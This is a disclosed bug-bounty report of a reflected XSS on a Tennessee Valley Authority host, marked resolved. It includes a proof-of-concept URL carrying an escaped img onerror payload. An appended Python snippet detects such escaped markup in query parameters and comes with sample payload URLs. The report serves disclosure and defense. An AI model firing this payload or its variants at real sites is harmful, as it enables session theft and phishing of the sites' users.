XSS reflected - pqm.tva.com

Disclosed: 2023-10-13 12:31:49 By thiagomarques To tennessee-valley-authority
Medium
Vulnerability Details
POC: https://pqm.tva.com/siteminderagent/forms/smpwservices.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7

## Impact

With the help of XSS, a hacker or attacker can perform social engineering on users by redirecting them from the real website to a fake one. A hacker can steal their cookies and download malware onto their system, and there are many more attack scenarios a skilled attacker can perform with XSS.
Report Stats
  • Report ID: 1363001
  • State: Closed
  • Substate: resolved
  • Upvotes: 13
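
A defensive check derived from the encoding used in the PoC above, as an added example that is not part of the original report: it decodes JavaScript-style `\uXXXX` escapes in query parameters before looking for markup, which a filter matching only a literal `<` or `>` would miss. The host `app.example`, the sample URLs and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# \uXXXX escape as written inside a JavaScript string literal
_U_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")
# Markup that should not appear in a form field such as USERNAME:
# a tag opener, or an inline event-handler attribute
_MARKUP = re.compile(r"<\s*[a-zA-Z/!]|\bon[a-z]+\s*=", re.IGNORECASE)


def decode_js_escapes(value):
    """Replace each \\uXXXX sequence with the character it encodes."""
    return _U_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), value)


def suspicious_params(url):
    """Return the names of query parameters that contain markup once
    percent-encoding and \\uXXXX escapes have both been decoded."""
    hits = []
    # parse_qsl performs the percent-decoding step
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if _MARKUP.search(decode_js_escapes(value)):
            hits.append(name)
    return hits


# Constructed sample request URLs (not taken from real logs)
SAMPLES = [
    # ordinary password-services request
    r"https://app.example/siteminderagent/forms/smpwservices.fcc"
    r"?USERNAME=jsmith&SMAUTHREASON=7",
    # raw backslash escapes, same encoding style as the PoC
    r"https://app.example/siteminderagent/forms/smpwservices.fcc"
    r"?USERNAME=\u003cimg\u0020src\u003dx\u003e&SMAUTHREASON=7",
    # same idea with the backslash percent-encoded as %5C
    "https://app.example/siteminderagent/forms/smpwservices.fcc"
    "?USERNAME=%5Cu003cb%5Cu003e&SMAUTHREASON=7",
]

if __name__ == "__main__":
    for url in SAMPLES:
        flagged = suspicious_params(url)
        print("FLAG" if flagged else "ok  ", flagged, url)
```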